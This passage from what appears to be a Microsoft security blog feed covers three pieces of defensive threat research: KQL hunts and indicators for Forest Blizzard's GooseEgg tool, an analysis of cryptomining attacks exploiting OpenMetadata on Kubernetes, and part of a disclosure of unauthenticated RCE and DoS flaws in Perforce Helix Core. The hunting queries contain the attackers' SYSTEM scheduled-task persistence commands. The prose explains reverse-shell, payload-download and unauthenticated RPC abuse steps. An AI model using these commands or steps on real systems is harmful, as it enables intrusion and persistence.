or InitiatingProcessSHA256 == "c60ead92cd376b689d1b4450f2578b36ea0bf64f3963cfa5546279fa4424c2a5" or SHA256 == "c60ead92cd376b689d1b4450f2578b36ea0bf64f3963cfa5546279fa4424c2a5" //hash value of DefragmentSrv.exe
or ProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\servtask.bat /SC MINUTE" or
   ProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\execute.bat /SC MINUTE" or
   ProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\doit.bat /SC MINUTE" or
   ProcessCommandLine contains "schtasks /DELETE /F /TN \\Microsoft\\Windows\\WinSrv" or
   InitiatingProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\servtask.bat /SC MINUTE" or
   InitiatingProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\execute.bat /SC MINUTE" or
   InitiatingProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\doit.bat /SC MINUTE" or
   InitiatingProcessCommandLine contains "schtasks /DELETE /F /TN \\Microsoft\\Windows\\WinSrv"
| project TimeGenerated, AccountName,AccountUpn,ActionType, DeviceId, DeviceName,FolderPath, FileName

Hunt for JavaScript constrained file

DeviceFileEvents
  | where TimeGenerated > ago(60d) // change the duration according to your requirement
  | where ActionType == "FileCreated"
  | where FolderPath startswith "C:\\Windows\\System32\\DriverStore\\FileRepository\\"
  | where FileName endswith ".js" or FileName == "MPDW-constraints.js"

Hunt for creation of registry key / value events

DeviceRegistryEvents
  | where TimeGenerated > ago(60d) // change the duration according to your requirement
  | where ActionType == "RegistryValueSet"
  | where RegistryKey contains "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{026CC6D7-34B2-33D5-B551-CA31EB6CE345}\\Server"
  | where RegistryValueName has "(Default)"
  | where RegistryValueData has "wayzgoose.dll" or RegistryValueData contains ".dll"

 Hunt for custom protocol handler

DeviceRegistryEvents
  | where TimeGenerated > ago(60d) // change the duration according to your requirement
  | where ActionType == "RegistryValueSet"
  | where RegistryKey contains "HKEY_CURRENT_USER\\Software\\Classes\\PROTOCOLS\\Handler\\rogue"
  | where RegistryValueName has "CLSID"
  | where RegistryValueData contains "{026CC6D7-34B2-33D5-B551-CA31EB6CE345}"

Indicators of compromise

Batch script artifacts:

  • execute.bat
  • doit.bat
  • servtask.bat
  • 7d51e5cc51c43da5deae5fbc2dce9b85c0656c465bb25ab6bd063a503c1806a9

GooseEgg artifacts:

  • justice.pdb
  • wayzgoose.pdb
IndicatorTypeDescription
c60ead92cd376b689d1b4450f2578b36ea0bf64f3963cfa5546279fa4424c2a5SHA-256Hash of GooseEgg binary DefragmentSrv.exe
6b311c0a977d21e772ac4e99762234da852bbf84293386fbe78622a96c0b052fSHA-256Hash of GooseEgg binary justice.exe
41a9784f8787ed86f1e5d20f9895059dac7a030d8d6e426b9ddcaf547c3393aaSHA-256Hash of wayzgoose[%n].dll – where %n is a random number

References

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Analyzing Forest Blizzard’s custom post-compromise tool for exploiting CVE-2022-38028 to obtain credentials appeared first on Microsoft Security Blog.

]]>
Attackers exploiting new critical OpenMetadata vulnerabilities on Kubernetes clusters http://approjects.co.za/?big=en-us/security/blog/2024/04/17/attackers-exploiting-new-critical-openmetadata-vulnerabilities-on-kubernetes-clusters/ Wed, 17 Apr 2024 16:00:00 +0000 Microsoft recently uncovered an attack that exploits new critical vulnerabilities in OpenMetadata to gain access to Kubernetes workloads and leverage them for cryptomining activity.

The post Attackers exploiting new critical OpenMetadata vulnerabilities on Kubernetes clusters appeared first on Microsoft Security Blog.

]]>
Attackers are constantly seeking new vulnerabilities to compromise Kubernetes environments. Microsoft recently uncovered an attack that exploits new critical vulnerabilities in OpenMetadata to gain access to Kubernetes workloads and leverage them for cryptomining activity.

OpenMetadata is an open-source platform designed to manage metadata across various data sources. It serves as a central repository for metadata lineage, allowing users to discover, understand, and govern their data. On March 15, 2024, several vulnerabilities in OpenMetadata platform were published. These vulnerabilities (CVE-2024-28255, CVE-2024-28847, CVE-2024-28253, CVE-2024-28848, CVE-2024-28254), affecting versions prior to 1.3.1, could be exploited by attackers to bypass authentication and achieve remote code execution. Since the beginning of April, we have observed exploitation of this vulnerability in Kubernetes environments.

Microsoft highly recommends customers to check clusters that run OpenMetadata workload and make sure that the image is up to date (version 1.3.1 or later). In this blog, we share our analysis of the attack, provide guidance for identifying vulnerable clusters and using Microsoft security solutions like Microsoft Defender for Cloud to detect malicious activity, and share indicators of compromise that defenders can use for hunting and investigation.

Attack flow

For initial access, the attackers likely identify and target Kubernetes workloads of OpenMetadata exposed to the internet. Once they identify a vulnerable version of the application, the attackers exploit the mentioned vulnerabilities to gain code execution on the container running the vulnerable OpenMetadata image.

After establishing a foothold, the attackers attempt to validate their successful intrusion and assess their level of control over the compromised system. This reconnaissance step often involves contacting a publicly available service. In this specific attack, the attackers send ping requests to domains that end with oast[.]me and oast[.]pro, which are associated with Interactsh, an open-source tool for detecting out-of-band interactions.

OAST domains are publicly resolvable yet unique, allowing attackers to determine network connectivity from the compromised system to attacker infrastructure without generating suspicious outbound traffic that might trigger security alerts. This technique is particularly useful for attackers to confirm successful exploitation and validate their connectivity with the victim, before establishing a command-and-control (C2) channel and deploying malicious payloads.

After gaining initial access, the attackers run a series of reconnaissance commands to gather information about the victim environment. The attackers query information on the network and hardware configuration, OS version, active users, etc.

As part of the reconnaissance phase, the attackers read the environment variables of the workload. In the case of OpenMetadata, those variables might contain connection strings and credentials for various services used for OpenMetadata operation, which could lead to lateral movement to additional resources.

Once the attackers confirm their access and validate connectivity, they proceed to download the payload, a cryptomining-related malware, from a remote server. We observed the attackers using a remote server located in China. The attacker’s server hosts additional cryptomining-related malware that are stored, for both Linux and Windows OS.

Screenshot of attacker's server showing cryptomining-related malware
Figure 1. Additional cryptomining-related malware in the attacker’s server

The downloaded file’s permissions are then elevated to grant execution privileges. The attacker also added a personal note to the victims:

Screenshot of note from attacker
Figure 2. Note from attacker

Next, the attackers run the downloaded cryptomining-related malware, and then remove the initial payloads from the workload. Lastly, for hands-on-keyboard activity, the attackers initiate a reverse shell connection to their remote server using Netcat tool, allowing them to remotely access the container and gain better control over the system. Additionally, for persistence, the attackers use cronjobs for task scheduling, enabling the execution of the malicious code at predetermined intervals.

How to check if your cluster is vulnerable

Administrators who run OpenMetadata workload in their cluster need to make sure that the image is up to date. If OpenMetadata should be exposed to the internet, make sure you use strong authentication and avoid using the default credentials.

To get a list of all the images running in the cluster:

kubectl get pods --all-namespaces -o=jsonpath='{range .items[*]}{.spec.containers[*].image}{"\n"}{end}' | grep 'openmetadata'

If there is a pod with a vulnerable image, make sure to update the image version for the latest version.

How Microsoft Defender for Cloud capabilities can help

This attack serves as a valuable reminder of why it’s crucial to stay compliant and run fully patched workloads in containerized environments. It also highlights the importance of a comprehensive security solution, as it can help detect malicious activity in the cluster when a new vulnerability is used in the attack. In this specific case, the attackers’ actions triggered Microsoft Defender for Containers alerts, identifying the malicious activity in the container. In the example below, Microsoft Defender for Containers alerted on an attempt to initiate a reverse shell from a container in a Kubernetes cluster, as happened in this attack:

Screenshot of Microsoft Defender Containers alert for detection of potential reverse shell
Figure 3. Microsoft Defender for Containers alert for detection of potential reverse shell

To prevent such attacks, Microsoft Defender for Containers provides agentless vulnerability assessment for Azure, AWS, and GCP, allowing you to identify vulnerable images in the environment, before the attack occurs.  Microsoft Defender Cloud Security Posture Management (CSPM) can help to prioritize the security issues according to their risk. For example, Microsoft Defender CSPM highlights vulnerable workloads exposed to the internet, allowing organizations to quickly remediate crucial threats.

Organizations can also monitor Kubernetes clusters using Microsoft Sentinel via Azure Kubernetes Service (AKS) solution for Sentinel, which enables detailed audit trail for user and system actions to identify malicious activity.

Indicators of compromise (IoCs)

TypeIoC
Executable SHA-2567c6f0bae1e588821bd5d66cd98f52b7005e054279748c2c851647097fa2ae2df
Executable SHA-25619a63bd5d18f955c0de550f072534aa7a6a6cc6b78a24fea4cc6ce23011ea01d
Executable SHA-25631cd1651752eae014c7ceaaf107f0bf8323b682ff5b24c683a683fdac7525bad
IP8[.]222[.]144[.]60
IP61[.]160[.]194[.]160
IP8[.]130[.]115[.]208

Hagai Ran Kestenberg, Security Researcher
Yossi Weizman, Senior Security Research Manager

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Attackers exploiting new critical OpenMetadata vulnerabilities on Kubernetes clusters appeared first on Microsoft Security Blog.

]]>
Patching Perforce perforations: Critical RCE vulnerability discovered in Perforce Helix Core Server http://approjects.co.za/?big=en-us/security/blog/2023/12/15/patching-perforce-perforations-critical-rce-vulnerability-discovered-in-perforce-helix-core-server/ Fri, 15 Dec 2023 17:00:00 +0000 Four new unauthenticated remotely exploitable security vulnerabilities discovered in the popular source code management platform Perforce Helix Core Server have been remediated after being responsibly disclosed by Microsoft. Perforce Server customers are strongly urged to update to version 2023.1/2513900.

The post Patching Perforce perforations: Critical RCE vulnerability discovered in Perforce Helix Core Server appeared first on Microsoft Security Blog.

]]>
Microsoft discovered, responsibly disclosed, and helped remediate four vulnerabilities that could be remotely exploited by unauthenticated attackers in Perforce Helix Core Server (“Helix Core Server”), a source code management platform largely used in the videogame industry and by multiple organizations spanning government, military, technology, retail, and more. Helix Core Server customers are strongly urged to update to version 2023.1/2513900 or upgrade to the 2023.2 version, available here: https://www.perforce.com/downloads/helix-core-p4d. The most critical of the four vulnerabilities has a CVSS score of 10.0 because it allows for arbitrary remote code execution as LocalSystem by unauthenticated remote attackers. An attacker with system-level remote code execution access to a source code management platform can insert backdoors into software products, exfiltrate source code and other intellectual property, and pivot to other sensitive enterprise infrastructure. While Microsoft has not observed evidence of in-the-wild exploitation for any of these vulnerabilities, exploitation of the most critical vulnerability could give unauthenticated attackers complete control over unpatched systems and connected infrastructure.

Due to the way Microsoft’s deployed Helix Core Server were configured, at no point were any of Microsoft’s internet-facing servers vulnerable to this critical vulnerability. No consumer, customer, or partner data was at risk or leaked.

Microsoft’s commitment to gaming and community security is paramount, and we worked closely with Perforce to report these vulnerabilities and drive remediation. We thank Perforce and are grateful for their team’s quick response in developing and releasing patches for these vulnerabilities.

While the three high severity vulnerabilities could be used to launch attacks such as a denial of service (DoS) against vulnerable systems, vulnerabilities with a CVSS score of 10.0 have the most severe potential impact that can extend beyond the vulnerable component, introducing a risk to software supply chains. The discovered vulnerabilities are summarized in the table below:

CVE IDCVSS ScoreCWE IDVulnerability
CVE-2023-57597.5CWE-405: Asymmetric Resource Consumption (Amplification)Unauthenticated DoS via RPC Header Abuse
CVE-2023-4584910.0CWE-306: Missing Authentication for Critical FunctionUnauthenticated Remote Code Execution as LocalSystem via user-bgtask RPC Command
CVE-2023-357677.5CWE-306: Missing Authentication for Critical FunctionUnauthenticated DoS via rmt-Shutdown RPC Command
CVE-2023-453197.5CWE-252: Unchecked Return ValueUnauthenticated DoS via rmt-UpdtFovrCommit RPC Command

Helix Core Server listens on TCP port 1666 by default, though server administrators will often change this port number to hide from scanners or to host Helix Core Server via TLS. Microsoft scanned the internet in November 2023 for TCP port 1666 with a custom Helix Core Server network signature and found over 1,000 exposed Perforce Helix Core Server instances.

In this blog, we detail how we discovered each of the vulnerabilities and highlight the potential impact if exploited. Alongside applying Perforce’s patches, we also include additional mitigation and protection guidance for customers to minimize the risk of exploitation. Lastly, we’re sharing this information with the broader community to drive awareness to further improve protections across the security ecosystem, and to emphasize the importance of responsible disclosure and collaboration to secure platforms and devices.

Discovering the vulnerabilities

To keep Microsoft’s game development studios and their customers safe, we recently conducted an application security review of Helix Core Server, the source code management platform relied on by most of our studios. For our security review, we analyzed Helix Core Server version 2023.1.244.2900 and installed it on Windows 11 22H2. We used Helix Core Server’s default installation options, which resulted by-design in the Helix Core Server service running as LocalSystem:

Screenshot of Perforce Server running as LocalSystem
Figure 1. Helix Core Server runs as LocalSystem

Recovering debug symbols

In 2014, Perforce open-sourced the code for their CLI Perforce Client, and informed users we can download the code from the bin.tools subdirectory of any given release. While having any source code is invaluable for application security vulnerability research purposes, this source code is specific to the client, not the server. The latter is only distributed in compiled binary form.

The binaries that are installed by Helix Core Server’s installer have their debug symbols stripped (removed from the distributed executable images), which makes it harder to understand the disassembled code during static analysis. To aid our review, we attempted to recover these debug symbols.

Discovering debug symbols

Sometimes applications offer software development kits (SDKs) that can be mined for debug symbol data. In the case of Helix Core Server, Perforce offers a “C/C++ API” package for the Windows (x64) platform that comes in the form of a .zip file containing three directories: include, lib, and sample. The lib directory is especially interesting for us, as it contains about 400 MB of .lib files:

Screenshot of SDK's .lib files
Figure 2. SDK’s .lib files

Like .exe files, .lib files are COFF files that can contain debug symbols. By using dumpbin.exe /symbols to inspect each .lib file, we found that the nine .lib files in the package contain a total of 1,251,756 debug symbol entries.

To understand why this is useful to us, let us consider an approximation of how .exe and .lib files are built:

Compilation process diagram depicting how SDK .obj files and server-specific .obj files link without debug symbols to p4s.exe.
Figure 3. Compilation process

In the diagram above, we can see that the SDK .obj files were linked along with server-specific .obj files to create Helix Core Server’s p4s.exe (“Perforce Service”) file. During that linking process, the debug symbols were stripped. However, the same SDK .obj files had their debug symbols retained when linked into the SDK .lib files. Since the .lib files contain debug symbols, we can match each compiled SDK function in each .lib file to its SDK function name. If we can then find those same compiled SDK functions in Helix Core Server’s .exe and .dll files, we can map the SDK function names to those functions as well, thus simplifying our analysis of the p4s.exe file.

To begin, we must first determine which SDK package to use for our analysis. If we look at the containing directory for the .zip file downloaded from the “C/C++ API” package, we see it contains 144 p4api SDK packages:

Screenshot of several p4api SDK packages
Figure 4. SDK packages

The reason we see 144 packages listed is that there is every combination of the following:

Package combinations multiplying nine possible compiler values, two possible values for linking, two possible values for build type, and four possible values for OpenSSL version.
Figure 5. Package combinations

That’s nine possible values for compiler, two possible values for linking, two possible values for build type, and four possible values for OpenSSL version. In other words, multiplying those four values together leads us to 144 possible combinations. To map named functions from the SDK’s .lib files to Helix Core Server’s p4s.exe file, we’ll need to choose the correct SDK package, since, for example, a function compiled with Visual Studio 2005 may look very different from the same function compiled with Visual Studio 2022.

So how do we know which compiler, linker option, build type, and OpenSSL version were used for our installed distribution of Helix Core Server? We don’t. We could make some educated guesses and examine artifacts such as the binaries’ Rich Headers to determine the right combination, but instead we chose to use automation to test all possible combinations. (Note that “Rich Headers” is a colloquial term used in the industry, not a Microsoft-official name for this structure.)

Finding the right set of debug symbols

After downloading all of the statically linked p4api archives from Perforce’s website, we used IDA Pro’s F.L.I.R.T. technology to create signatures for each Perforce Helix Core Server SDK package. To do so, we automated the following steps:

  1. Use pcf.exe (“parsecoff”) from IDA Pro’s Fast Library Acquisition for Identification and Recognition (FLAIR) SDK to create .pat (“pattern”) files for each Perforce Helix Core Server SDK package’s .lib file.
  2. Use sigmake.exe from the FLAIR SDK to create a .sig (“signature”) file for all the .pat files from each given Perforce Helix Core Server SDK package.
  3. Use zipsig.exe from the FLAIR SDK to compress each .sig file.
  4. Disassemble Helix Core Server’s p4s.exe file with IDA Pro and save the resulting .idb (“IDA database”) file.
  5. For each .sig file, open the .idb file, apply the .sig file, count the number of .sig file function matches, and close the .idb file without saving the modifications.
  6. Rank the number of function matches for each .sig file.

After following the process above, we found the debug symbols from p4api_vs2017_static_openssl1.1.1.zip had the most function matches in p4s.exe:

Function
Matches
Signature File
11,928p4api_vs2017_static_openssl1.1.1_p4api-2023.1.2468153-vs2017_static.sig
11,887p4api_vs2017_static_openssl3_p4api-2023.1.2468153-vs2017_static.sig
11,847p4api_vs2017_static_openssl1.0.2_p4api-2023.1.2468153-vs2017_static.sig
11,847p4api_vs2017_static_p4api-2023.1.2468153-vs2017_static.sig
10,228p4api_vs2017_static_vsdebug_openssl1.1.1_p4api-2023.1.2468153-vs2017_static_vsdebug.sig
10,187p4api_vs2017_static_vsdebug_openssl3_p4api-2023.1.2468153-vs2017_static_vsdebug.sig
10,147p4api_vs2017_static_vsdebug_openssl1.0.2_p4api-2023.1.2468153-vs2017_static_vsdebug.sig
10,147p4api_vs2017_static_vsdebug_p4api-2023.1.2468153-vs2017_static_vsdebug.sig
8,222p4api_vs2019_static_openssl1.1.1_p4api-2023.1.2468153-vs2019_static.sig
8,195p4api_vs2019_static_openssl3_p4api-2023.1.2468153-vs2019_static.sig
8,167p4api_vs2019_static_openssl1.0.2_p4api-2023.1.2468153-vs2019_static.sig
8,167p4api_vs2019_static_p4api-2023.1.2468153-vs2019_static.sig
7,804p4api_vs2019_static_vsdebug_openssl1.1.1_p4api-2023.1.2468153-vs2019_static_vsdebug.sig
7,777p4api_vs2019_static_vsdebug_openssl3_p4api-2023.1.2468153-vs2019_static_vsdebug.sig
7,749p4api_vs2019_static_vsdebug_openssl1.0.2_p4api-2023.1.2468153-vs2019_static_vsdebug.sig
7,749p4api_vs2019_static_vsdebug_p4api-2023.1.2468153-vs2019_static_vsdebug.sig
5,818p4api_vs2022_static_openssl1.1.1_p4api-2023.1.2468153-vs2022_static.sig
5,802p4api_vs2022_static_openssl3_p4api-2023.1.2468153-vs2022_static.sig
5,784p4api_vs2022_static_openssl1.0.2_p4api-2023.1.2468153-vs2022_static.sig
5,784p4api_vs2022_static_p4api-2023.1.2468153-vs2022_static.sig
5,525p4api_vs2022_static_vsdebug_openssl1.1.1_p4api-2023.1.2468153-vs2022_static_vsdebug.sig
5,509p4api_vs2022_static_vsdebug_openssl3_p4api-2023.1.2468153-vs2022_static_vsdebug.sig
5,491p4api_vs2022_static_vsdebug_openssl1.0.2_p4api-2023.1.2468153-vs2022_static_vsdebug.sig
5,491p4api_vs2022_static_vsdebug_p4api-2023.1.2468153-vs2022_static_vsdebug.sig
1,639p4api_vs2015_static_openssl1.1.1_p4api-2023.1.2468153-vs2015_static.sig
1,639p4api_vs2015_static_vsdebug_openssl1.1.1_p4api-2023.1.2468153-vs2015_static_vsdebug.sig
1,630p4api_vs2015_static_openssl1.0.2_p4api-2023.1.2468153-vs2015_static.sig
1,630p4api_vs2015_static_p4api-2023.1.2468153-vs2015_static.sig
1,630p4api_vs2015_static_vsdebug_openssl1.0.2_p4api-2023.1.2468153-vs2015_static_vsdebug.sig
1,630p4api_vs2015_static_vsdebug_p4api-2023.1.2468153-vs2015_static_vsdebug.sig
1,628p4api_vs2015_static_openssl3_p4api-2023.1.2468153-vs2015_static.sig
1,628p4api_vs2015_static_vsdebug_openssl3_p4api-2023.1.2468153-vs2015_static_vsdebug.sig
1,042p4api_vs2013_static_openssl1.1.1_p4api-2023.1.2468153-vs2013_static.sig
1,041p4api_vs2013_static_vsdebug_openssl1.1.1_p4api-2023.1.2468153-vs2013_static_vsdebug.sig
1,040p4api_vs2013_static_openssl1.0.2_p4api-2023.1.2468153-vs2013_static.sig
1,040p4api_vs2013_static_p4api-2023.1.2468153-vs2013_static.sig
1,039p4api_vs2013_static_vsdebug_openssl1.0.2_p4api-2023.1.2468153-vs2013_static_vsdebug.sig
1,039p4api_vs2013_static_vsdebug_p4api-2023.1.2468153-vs2013_static_vsdebug.sig
1,033p4api_vs2013_static_openssl3_p4api-2023.1.2468153-vs2013_static.sig
1,032p4api_vs2013_static_vsdebug_openssl3_p4api-2023.1.2468153-vs2013_static_vsdebug.sig
973p4api_vs2012_static_openssl1.1.1_p4api-2023.1.2468153-vs2012_static.sig
972p4api_vs2012_static_vsdebug_openssl1.1.1_p4api-2023.1.2468153-vs2012_static_vsdebug.sig
971p4api_vs2012_static_openssl1.0.2_p4api-2023.1.2468153-vs2012_static.sig
971p4api_vs2012_static_p4api-2023.1.2468153-vs2012_static.sig
970p4api_vs2012_static_vsdebug_openssl1.0.2_p4api-2023.1.2468153-vs2012_static_vsdebug.sig
970p4api_vs2012_static_vsdebug_p4api-2023.1.2468153-vs2012_static_vsdebug.sig
967p4api_vs2012_static_openssl3_p4api-2023.1.2468153-vs2012_static.sig
966p4api_vs2012_static_vsdebug_openssl3_p4api-2023.1.2468153-vs2012_static_vsdebug.sig
838p4api_vs2010_static_openssl1.1.1_p4api-2023.1.2468153-vs2010_static.sig
838p4api_vs2010_static_vsdebug_openssl1.1.1_p4api-2023.1.2468153-vs2010_static_vsdebug.sig
837p4api_vs2010_static_openssl1.0.2_p4api-2023.1.2468153-vs2010_static.sig
837p4api_vs2010_static_p4api-2023.1.2468153-vs2010_static.sig
837p4api_vs2010_static_vsdebug_openssl1.0.2_p4api-2023.1.2468153-vs2010_static_vsdebug.sig
837p4api_vs2010_static_vsdebug_p4api-2023.1.2468153-vs2010_static_vsdebug.sig
833p4api_vs2010_static_openssl3_p4api-2023.1.2468153-vs2010_static.sig
833p4api_vs2010_static_vsdebug_openssl3_p4api-2023.1.2468153-vs2010_static_vsdebug.sig
495p4api_vs2008_static_openssl1.1.1_p4api-2023.1.2468153-vs2008_static.sig
495p4api_vs2008_static_vsdebug_openssl1.1.1_p4api-2023.1.2468153-vs2008_static_vsdebug.sig
494p4api_vs2008_static_openssl1.0.2_p4api-2023.1.2468153-vs2008_static.sig
494p4api_vs2008_static_p4api-2023.1.2468153-vs2008_static.sig
494p4api_vs2008_static_vsdebug_openssl1.0.2_p4api-2023.1.2468153-vs2008_static_vsdebug.sig
494p4api_vs2008_static_vsdebug_p4api-2023.1.2468153-vs2008_static_vsdebug.sig
490p4api_vs2008_static_openssl3_p4api-2023.1.2468153-vs2008_static.sig
490p4api_vs2008_static_vsdebug_openssl3_p4api-2023.1.2468153-vs2008_static_vsdebug.sig
440p4api_vs2005_static_openssl1.1.1_p4api-2023.1.2468153-vs2005_static.sig
440p4api_vs2005_static_vsdebug_openssl1.1.1_p4api-2023.1.2468153-vs2005_static_vsdebug.sig
439p4api_vs2005_static_openssl1.0.2_p4api-2023.1.2468153-vs2005_static.sig
439p4api_vs2005_static_p4api-2023.1.2468153-vs2005_static.sig
439p4api_vs2005_static_vsdebug_openssl1.0.2_p4api-2023.1.2468153-vs2005_static_vsdebug.sig
439p4api_vs2005_static_vsdebug_p4api-2023.1.2468153-vs2005_static_vsdebug.sig
435p4api_vs2005_static_openssl3_p4api-2023.1.2468153-vs2005_static.sig
435p4api_vs2005_static_vsdebug_openssl3_p4api-2023.1.2468153-vs2005_static_vsdebug.sig

The remainder of this blog post leverages these signatures for p4s.exe’s function names and type information.

Investigating the RPC header

Given that Helix Core Server runs as LocalSystem, local elevation of privilege attacks would certainly be worthwhile to explore. However, remote attacks via a network are much more intriguing from a vulnerability research perspective. Our next step is to investigate how Helix Core Server handles data it receives from remote users, or in our case, attackers.

Using TCPView, we can see that p4s.exe is listening for incoming connections on TCP port 1666:

Screenshot of TCPView showing Perforce Server listening on local TCP port 1666
Figure 6. TCPView showing Helix Core Server’s listening TCP port

Programs built for Windows that listen on TCP ports for incoming connections almost always use Winsock’s recv() function to receive incoming network data from clients. Using IDA Pro’s cross-references (“CODE XREF”s below), we can see that recv() is called by several functions:

Screenshot of source code cross-references to recv()
Figure 7. Code cross-references to recv()

We’re looking to assess how received network data is parsed and handled, and to save time in determining which of the functions above actually receives the connected client data via recv(), we used a debugger to set a breakpoint on recv() and reviewed its thread’s call-stack to reveal the following chain of function calls:

A call-stack diagram starting with Rpc::DispatchOne(), which then calls RpcTransport::Receive(), which calls NetBuffer::Receive(), which is followed by NetTcpTransport::SendOrReceive(), which finally calls recv().
Figure 8. The function call-stack for recv() at runtime

In the call-stack above, “Rpc” is short for “Remote Procedure Call”, a common term used for remotely executing functions.

Although we’re assessing the Helix Core Server, the function RpcTransport::Receive() (in Figure 8) is also included in the client source code discussed above (note that the comments are from Perforce’s developers, not from Microsoft):

Screenshot of source code for RpcTransport::Receive()
Figure 9. Source code for RpcTransport::Receive()

The code above does the following:

  1. On line 69, calls NetBuffer::Receive() to receive five bytes of data from the connected TCP client. We will refer to these five bytes as the RPC header.
  2. On line 72, verifies that the first byte’s value equals the value of the following four bytes using the XOR operation to compute a parity byte checksum.
  3. On line 78, interprets those following four bytes as a 32-bit little-endian value named length.
  4. On line 85, verifies that length >= 12 and that length < 0x1FFFFFFF.
  5. On line 93, allocates memory of size length and receives length bytes from the connected TCP client.

However, there’s a design risk in the code above, in that there’s not sufficient protection against asymmetric resource consumption attacks from remote unauthenticated attackers. An attacker could connect to the Helix Core Server, send a five-byte RPC header specifying a length value of 0x1FFFFFFE, and cause the server to allocate 0x1FFFFFFE bytes (about 537 MB) of memory. An attacker could exploit this vulnerability by establishing numerous connections and requesting these large memory allocations via each connection, quickly consuming all the server’s available memory. Once available memory is exhausted, the next call to Alloc() (step 5 above) will lead Helix Core Server’s memory allocator (which happens to be mimalloc) to throw an unhandled std::bad_alloc() exception from mi_try_new_handler(), causing the Helix Core Server process to crash and not restart. This denial-of-service (DoS) attack is exploitable by remote unauthenticated attackers.

This vulnerability is now identified as CVE-2023-5759 and it has a CVSS score of 7.5.

Investigating RPC handler functions

We showed in the call-stack above that RpcTransport::Receive() is called by Rpc::DispatchOne(). This latter function takes the allocated buffer received by RpcTransport::Receive(), parses it as an RPC command with optional arguments, looks up the handler for the given RPC command, and calls the handler with the received arguments. Many of these RPC commands are mapped to the p4 commands listed here. Specifically, there are 202 formally documented p4 commands, and about 450 defined RPC commands, though not all RPC commands have their handlers registered by default at runtime.

Since we’re most interested in the possibility of remote unprivileged attacks against Helix Core Server in its default configuration, we created our own Perforce client from scratch that attempts to call (without any authentication) each of the approximately 450 RPC commands defined in p4s.exe. Of those, we found that about 360 RPC commands have their handlers registered by default at runtime. This is too high of a count to manually assess in a reasonable amount of time, so we had to find other means to prioritize our RPC command analysis.

We found that p4s.exe statically imports 382 API functions. Of those, we identified the most interesting functions that could potentially achieve remote code execution, assuming an unauthenticated remote attacker could both execute an RPC function that calls one of these API functions and control the arguments to that API function. These functions are:

Assessing this short list of API functions and analyzing code-flow paths from RPC handlers to these functions was a much more tractable problem than manually reviewing each of the approximately 360 registered RPC handlers.

The bgtask command

By reviewing cross-references with IDA Pro, we were able to identify the following call-chain from an RPC command handler to CreateProcess():

A call-chain displays the RPC handler for p4 bgtask command calls RunCommand::RunChild(), which calls RunCommand::DoRunChild(), then RunProcess(), and finally calls CreateProcess().
Figure 10. The function call-chain from bgtask to CreateProcess()

According to Perforce’s documentation, the p4 bgtask command “enables a Helix Core superuser on the p4 command-line client to run commands or programs remotely on the server in the background.” It’s thus not surprising that this type of command would end up calling CreateProcess(), but since the documentation states that this command can only be run by a superuser, our only hope of finding a security vulnerability here was if there was a bug in the authentication component or in how the RPC arguments were getting parsed.

To begin our assessment of p4 bgtask, we used the custom Perforce client that we wrote to see how the server would respond if we tried remotely calling bgtask without any authentication. To our surprise, the server didn’t return any errors. In fact, the server ran the command line that we sent to it, and this child process ran as LocalSystem.

Upon further investigation, this is by design, with the manual noting to “Run p4 protect immediately after installing Helix Server for the first time. Before the first call to p4 protect, every Helix Server user is a superuser and thus can access and change anything in the depot”. In this context, “every Helix Server user” also includes unauthenticated anonymous remote users.

If an administrator does not manually perform those post-installation steps, this missing authentication for a critical function allows unauthenticated remote attackers to run arbitrary command lines (including PowerShell command lines with script blocks) as LocalSystem when Helix Core Server is installed with its default configuration.

This vulnerability is now identified as CVE-2023-45849 and it has a CVSS score of 10.0.

The rmt-Shutdown RPC handler

When a user (or attacker) uses the p4 bgtask discussed above with the standard Perforce Client, the client sends the RPC command name user-bgtask to the server to execute that command. However, some RPC command names that are accepted by the server don’t have a corresponding Perforce Client command; one of those RPC command names is rmt-Shutdown.

Although it’s not possible to send the rmt-Shutdown RPC command with the standard Perforce Client (nor the Perforce Admin Tool), and it doesn’t appear to be documented on Perforce’s website, we were able to send the command with our custom Perforce client. We found that the handler for rmt-Shutdown requires a username of remote but doesn’t require any authentication credentials for that username. When the Perforce Helix Core Server receives this command, it terminates the Helix Core Server process, thereby allowing unauthenticated remote attackers to perform DoS attacks against the server.

This vulnerability is now identified as CVE-2023-35767 and it has a CVSS score of 7.5.

The rmt-UpdtFovrCommit RPC handler

Similar to the rmt-Shutdown RPC command name, the RPC command name rmt-UpdtFovrCommit (which is likely short for “remote update failover commit”) cannot be sent via the standard Perforce Client nor Admin Tool and doesn’t appear to be documented on Perforce’s website but can be sent with a custom Perforce client. This RPC function piqued our interest when we first tested for registered RPC handlers, since when our custom-built scanner sent a rmt-UpdtFovrCommit RPC command as an anonymous user and without any command arguments to the Helix Core Server, the Helix Core Server process crashed.

We can see the reason for the crash in the decompiled rmt-UpdtFovrCommit handler code below:

Screenshot of source code from the decompiled rmt-UpdtFovrCommit handler function
Figure 11. Snippet of code from the decompiled rmt-UpdtFovrCommit handler function

